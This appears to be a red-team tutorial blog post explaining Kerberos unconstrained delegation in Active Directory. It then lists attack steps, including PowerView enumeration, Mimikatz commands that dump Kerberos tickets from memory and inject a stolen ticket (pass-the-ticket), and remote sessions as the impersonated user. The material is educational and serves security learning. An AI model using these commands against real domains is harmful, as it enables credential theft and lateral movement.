Red Teaming — AD (Kerberos Unconstrained Delegation Attack)

What is Kerberos delegation?

What is Kerberos delegation?

Ah, Kerberos delegation! That sounds like a fancy term, right? Well, let me explain it to you in a way that’s both engaging and easy to understand.

Imagine you’re throwing a party, and you’ve hired a caterer to take care of the food. The caterer has all the necessary ingredients and utensils, but they need to access your kitchen to prepare the dishes. However, you don’t want to give them full access to your kitchen, as that might be risky.

This is where Kerberos delegation comes in. In this analogy, your kitchen is like a resource that needs to be accessed securely. Kerberos is a network authentication protocol that allows users to authenticate themselves to a network resource, like your kitchen.

Kerberos delegation allows a user to delegate their credentials to another user or service so that the delegated user can access resources on their behalf. In our party example, this would be like you delegating your kitchen access to the caterer, but only for specific tasks, such as preparing the food and cleaning up afterward. This way, the caterer can access the resources they need without having full access to your kitchen, which reduces the risk of them doing anything they’re not supposed to.

In the world of cybersecurity, Kerberos delegation is used to ensure that only authorized users or services can access sensitive resources. By delegating credentials, users, and services can access resources without compromising security. So, the next time you hear about Kerberos delegation, think of it as delegating your kitchen access to a trusted caterer for a party.

So, what is Unconstrained delegation?

Twenty years ago, Microsoft introduced Kerberos unconstrained delegation, a nifty feature that allowed services to access other services on behalf of an authenticated user without having to go through the tedious reauthentication process. While this made life easier for everyone, it also presented a glaring security risk. If a server with unconstrained delegation enabled fell into the wrong hands, threat actors could exploit this trust to gain access to the entire environment.

“If unconstrained delegation is turned on, a copy of the user’s TGT is available in the service ticket; the service can then store the TGT in its Local Security Authority Subsystem Service (LSASS) and use it again to impersonate that user for the lifetime of the service ticket. Once an attacker finds such a server configured for unconstrained delegation, they can steal the service ticket from memory, extract the TGT and use it, impersonating the user as well and making use of their privileges to move within a compromised environment.” [2]

Use Case

The scenario involves gaining local administrative access to a host with Kerberos Unconstrained Delegation enabled.


How to Attack

  1. Find a machine with unconstrained delegation (Powerview)
Get-NetComputer -Unconstrained

PowerShell cmdlet that queries computers in the current domain for unconstrained delegation.

2. Gain local admin to the machine

3. Make the user authenticate with the machine

If unconstrained delegation is turned on for a computer, then any time an account connects to that computer, their ticket-granting ticket (TGT) from the Key Distribution Center (KDC) is stored in memory for later use by the computer. If the machine is compromised, the adversary can get that TGT and misuse it to do a great deal of damage — especially if the TGT is for a highly privileged user.

# We must trick or wait for the victim user to connect to a service on the machine.

Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'

Run the above command the get all the tickets

4. If the victim user ticket exists, then do pass-the-ticket. ticket will be injected into the session.

Invoke-Mimikatz -Command '"kerberos::ptt victim-ticket.kirbi"'

5. Now, we can use Enter-PSSession to access other machines as the victim

Enter-PSSession -ComputerName computer1

Conclusion

Fear not, Microsoft sought to mitigate this risk by introducing constrained delegation in 2003, which gave domain administrators the power to restrict what services a particular server could access. With the release of Windows Server 2012, this power was extended to service administrators, who could now decide whether front-end services could access back-end resources. But be warned, unconstrained delegation is still the least secure option, and if attackers can exploit it, they can move laterally throughout the environment with ease, impersonating legitimate users and gaining access to sensitive information. So, stay vigilant and choose your delegation options wisely.


Hay Yay!!!

Please give me a clap if you found it to be useful and follow me to get more hacking knowledge.


References

  1. https://blog.netwrix.com/2022/12/02/unconstrained-delegation/
  2. https://www.qomplx.com/blog/qomplx-knowledge-kerberos-delegation-attacks-explained/